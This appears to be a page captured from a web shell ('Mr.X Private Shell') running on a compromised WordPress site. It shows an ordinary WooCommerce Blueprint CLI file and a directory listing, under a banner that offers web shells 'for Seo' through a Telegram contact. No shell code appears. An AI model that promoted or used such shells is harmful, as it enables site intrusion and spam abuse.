__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace Automattic\WooCommerce\Blueprint;
use Automattic\WooCommerce\Blueprint\Cli\ExportCli;
use Automattic\WooCommerce\Blueprint\Cli\ImportCli;
$autoload_path = __DIR__ . '/../vendor/autoload.php';
if ( file_exists( $autoload_path ) ) {
require_once $autoload_path;
}
/**
* Class Cli.
*
* This class is included and execute from WC_CLI(class-wc-cli.php) to register
* WP CLI commands.
*/
class Cli {
/**
* Register WP CLI commands.
*
* @return void
*/
public static function register_commands() {
\WP_CLI::add_command(
'wc blueprint import',
function ( $args, $assoc_args ) {
$import = new ImportCli( $args[0] );
$import->run( $assoc_args );
},
array(
'synopsis' => array(
array(
'type' => 'positional',
'name' => 'schema-path',
'optional' => false,
),
array(
'type' => 'assoc',
'name' => 'show-messages',
'optional' => true,
'options' => array( 'all', 'error', 'info', 'debug' ),
),
),
'when' => 'after_wp_load',
)
);
\WP_CLI::add_command(
'wc blueprint export',
function ( $args, $assoc_args ) {
$export = new ExportCli( $args[0] );
$steps = array();
if ( isset( $assoc_args['steps'] ) ) {
$steps = array_map(
function ( $step ) {
return trim( $step );
},
explode( ',', $assoc_args['steps'] )
);
}
$export->run(
array(
'steps' => $steps,
'format' => 'json',
)
);
},
array(
'synopsis' => array(
array(
'type' => 'positional',
'name' => 'save-to',
'optional' => false,
),
array(
'type' => 'assoc',
'name' => 'steps',
'optional' => true,
),
),
'when' => 'after_wp_load',
)
);
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Cli | Folder | 0775 |
|
|
| Exporters | Folder | 0775 |
|
|
| Importers | Folder | 0775 |
|
|
| ResourceStorages | Folder | 0775 |
|
|
| ResultFormatters | Folder | 0775 |
|
|
| Schemas | Folder | 0775 |
|
|
| Steps | Folder | 0775 |
|
|
| docs | Folder | 0775 |
|
|
| BuiltInExporters.php | File | 474 B | 0664 |
|
| BuiltInStepProcessors.php | File | 1.81 KB | 0664 |
|
| ClassExtractor.php | File | 6.05 KB | 0664 |
|
| Cli.php | File | 1.78 KB | 0664 |
|
| ExportSchema.php | File | 4.3 KB | 0664 |
|
| ImportSchema.php | File | 2.34 KB | 0664 |
|
| ImportStep.php | File | 4.46 KB | 0664 |
|
| Logger.php | File | 4.07 KB | 0664 |
|
| ResourceStorages.php | File | 1.45 KB | 0664 |
|
| StepProcessor.php | File | 680 B | 0664 |
|
| StepProcessorResult.php | File | 3.56 KB | 0664 |
|
| UsePluginHelpers.php | File | 3.13 KB | 0664 |
|
| UsePubSub.php | File | 1.51 KB | 0664 |
|
| UseWPFunctions.php | File | 9.72 KB | 0664 |
|
| Util.php | File | 4.39 KB | 0664 |
|